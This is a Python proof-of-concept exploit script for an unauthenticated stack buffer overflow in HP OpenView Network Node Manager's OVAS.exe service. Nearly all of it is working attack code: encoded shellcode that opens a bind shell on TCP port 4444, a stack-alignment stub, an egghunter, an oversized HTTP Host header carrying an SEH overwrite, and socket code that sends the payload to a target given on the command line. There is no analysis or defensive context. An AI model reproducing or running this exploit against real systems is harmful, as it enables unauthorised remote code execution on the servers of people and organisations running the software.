ovnnm.py

#!/usr/bin/python
#
# POC for HP OpenView NNM B.07.50 OVAS.EXE Pre-Authentication Stack Buffer Overflow
# Based on HP OpenView Network Node Manager (OV NNM) 7.5.1 - 'OVAS.exe' Unauthenticated Overflow (SEH)
# https://www.exploit-db.com/exploits/5342/
#
# Payload = Bind shell on TCP port 4444
# Tested on Windows Server 2003 SP1
#
# Usage: ovnnm.py <Host> <Port>
# Example: ovnnm.py 192.168.123.123 7510
#

import socket
import os
import sys

bind =  ""
bind += "\x89\xe5\xda\xd6\xd9\x75\xf4\x5d\x55\x59\x49\x49\x49"
bind += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
bind += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
bind += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
bind += "\x58\x50\x38\x41\x42\x75\x4a\x49\x79\x6c\x4b\x58\x4f"
bind += "\x72\x75\x50\x73\x30\x63\x30\x51\x70\x4c\x49\x6a\x45"
bind += "\x30\x31\x79\x50\x33\x54\x4e\x6b\x76\x30\x44\x70\x6e"
bind += "\x6b\x73\x62\x66\x6c\x6c\x4b\x71\x42\x42\x34\x4e\x6b"
bind += "\x52\x52\x51\x38\x76\x6f\x6e\x57\x42\x6a\x65\x76\x45"
bind += "\x61\x39\x6f\x4e\x4c\x55\x6c\x75\x31\x53\x4c\x66\x62"
bind += "\x46\x4c\x77\x50\x39\x51\x38\x4f\x56\x6d\x36\x61\x49"
bind += "\x57\x5a\x42\x79\x62\x52\x72\x52\x77\x6e\x6b\x53\x62"
bind += "\x52\x30\x6c\x4b\x42\x6a\x65\x6c\x6c\x4b\x50\x4c\x32"
bind += "\x31\x43\x48\x68\x63\x33\x78\x65\x51\x68\x51\x63\x61"
bind += "\x6c\x4b\x31\x49\x31\x30\x33\x31\x39\x43\x4c\x4b\x33"
bind += "\x79\x47\x68\x49\x73\x54\x7a\x47\x39\x6e\x6b\x34\x74"
bind += "\x4e\x6b\x43\x31\x6b\x66\x50\x31\x49\x6f\x4c\x6c\x6f"
bind += "\x31\x58\x4f\x36\x6d\x46\x61\x4a\x67\x34\x78\x59\x70"
bind += "\x32\x55\x38\x76\x65\x53\x73\x4d\x48\x78\x65\x6b\x33"
bind += "\x4d\x71\x34\x44\x35\x78\x64\x72\x78\x4c\x4b\x32\x78"
bind += "\x55\x74\x63\x31\x78\x53\x33\x56\x4e\x6b\x44\x4c\x62"
bind += "\x6b\x4e\x6b\x56\x38\x75\x4c\x77\x71\x5a\x73\x4e\x6b"
bind += "\x74\x44\x6c\x4b\x56\x61\x4e\x30\x4d\x59\x53\x74\x45"
bind += "\x74\x45\x74\x33\x6b\x53\x6b\x70\x61\x62\x79\x70\x5a"
bind += "\x66\x31\x49\x6f\x39\x70\x43\x6f\x73\x6f\x70\x5a\x4e"
bind += "\x6b\x65\x42\x4a\x4b\x6e\x6d\x63\x6d\x45\x38\x44\x73"
bind += "\x44\x72\x73\x30\x77\x70\x73\x58\x30\x77\x31\x63\x44"
bind += "\x72\x33\x6f\x50\x54\x33\x58\x52\x6c\x50\x77\x55\x76"
bind += "\x34\x47\x69\x6f\x58\x55\x78\x38\x4e\x70\x53\x31\x63"
bind += "\x30\x67\x70\x76\x49\x39\x54\x42\x74\x46\x30\x65\x38"
bind += "\x67\x59\x6f\x70\x52\x4b\x65\x50\x79\x6f\x58\x55\x31"
bind += "\x7a\x63\x38\x62\x79\x70\x50\x6a\x42\x79\x6d\x47\x30"
bind += "\x56\x30\x61\x50\x66\x30\x63\x58\x7a\x4a\x36\x6f\x69"
bind += "\x4f\x69\x70\x4b\x4f\x59\x45\x6e\x77\x50\x68\x55\x52"
bind += "\x73\x30\x66\x71\x73\x6c\x6e\x69\x6a\x46\x30\x6a\x76"
bind += "\x70\x42\x76\x50\x57\x33\x58\x4b\x72\x6b\x6b\x45\x67"
bind += "\x53\x57\x49\x6f\x4b\x65\x53\x67\x72\x48\x38\x37\x38"
bind += "\x69\x70\x38\x39\x6f\x6b\x4f\x6a\x75\x61\x47\x61\x78"
bind += "\x53\x44\x48\x6c\x55\x6b\x6b\x51\x59\x6f\x7a\x75\x51"
bind += "\x47\x6d\x47\x75\x38\x64\x35\x32\x4e\x62\x6d\x63\x51"
bind += "\x79\x6f\x69\x45\x53\x58\x72\x43\x70\x6d\x33\x54\x65"
bind += "\x50\x4d\x59\x58\x63\x31\x47\x30\x57\x56\x37\x65\x61"
bind += "\x6b\x46\x50\x6a\x47\x62\x71\x49\x53\x66\x78\x62\x49"
bind += "\x6d\x63\x56\x49\x57\x37\x34\x54\x64\x77\x4c\x56\x61"
bind += "\x56\x61\x6c\x4d\x37\x34\x47\x54\x64\x50\x6a\x66\x77"
bind += "\x70\x53\x74\x42\x74\x52\x70\x43\x66\x61\x46\x43\x66"
bind += "\x51\x56\x53\x66\x62\x6e\x52\x76\x53\x66\x32\x73\x31"
bind += "\x46\x73\x58\x31\x69\x38\x4c\x75\x6f\x4e\x66\x59\x6f"
bind += "\x38\x55\x6b\x39\x39\x70\x52\x6e\x61\x46\x47\x36\x4b"
bind += "\x4f\x36\x50\x45\x38\x53\x38\x4f\x77\x75\x4d\x33\x50"
bind += "\x6b\x4f\x68\x55\x4f\x4b\x79\x70\x77\x6d\x64\x6a\x35"
bind += "\x5a\x71\x78\x4f\x56\x6a\x35\x6f\x4d\x4d\x4d\x49\x6f"
bind += "\x58\x55\x47\x4c\x33\x36\x73\x4c\x74\x4a\x4f\x70\x39"
bind += "\x6b\x6b\x50\x42\x55\x53\x35\x4d\x6b\x37\x37\x54\x53"
bind += "\x30\x72\x70\x6f\x51\x7a\x47\x70\x50\x53\x49\x6f\x78"
bind += "\x55\x41\x41"

stack_align = "\x54\x58\x2D\x04\x4B\x54\x55\x2D\x04\x4B\x54\x55\x2D\x04\x4C\x56\x55\x50\x5C"

egghunt_built = "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x09\x08\x55\x08\x2D\x09\x08\x55\x08\x2D\x79\x08\x56\x07\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x70\x09\x07\x6F\x2D\x70\x09\x07\x6F\x2D\x71\x77\x07\x72\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x45\x39\x7B\x01\x2D\x45\x39\x7B\x01\x2D\x46\x39\x7E\x02\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x05\x6C\x38\x45\x2D\x05\x6C\x38\x45\x2D\x07\x6F\x37\x45\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x41\x53\x37\x09\x2D\x41\x53\x37\x09\x2D\x42\x54\x37\x79\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x54\x37\x65\x45\x2D\x54\x37\x65\x45\x2D\x56\x39\x68\x46\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x50\x3E\x39\x31\x2D\x50\x3E\x39\x31\x2D\x51\x41\x3B\x33\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x33\x09\x66\x55\x2D\x33\x09\x66\x55\x2D\x34\x6C\x69\x55\x50"

crash = "A" * 3379 + "\x75\x04\x4c\x3b\x37\x6d" + "B" * 10 + stack_align + egghunt_built + "C" * (4000 - 3379 - 6 - 10 - len(stack_align) - len(egghunt_built))

buffer = "GET /topology/homeBaseView HTTP/1.1\r\n"
buffer += "Host: " + crash + "\r\n"
buffer += "Content-Type: application/x-www-form-urlencoded\r\n"
buffer += "User-Agent: TIPTIPTIP\r\n"
buffer += "Content-Length: 1048580\r\n\r\n"
buffer += "W00TW00T" + bind

print buffer

host = sys.argv[1]
port = int(sys.argv[2])

expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect((host, port))
expl.send(buffer)
expl.close()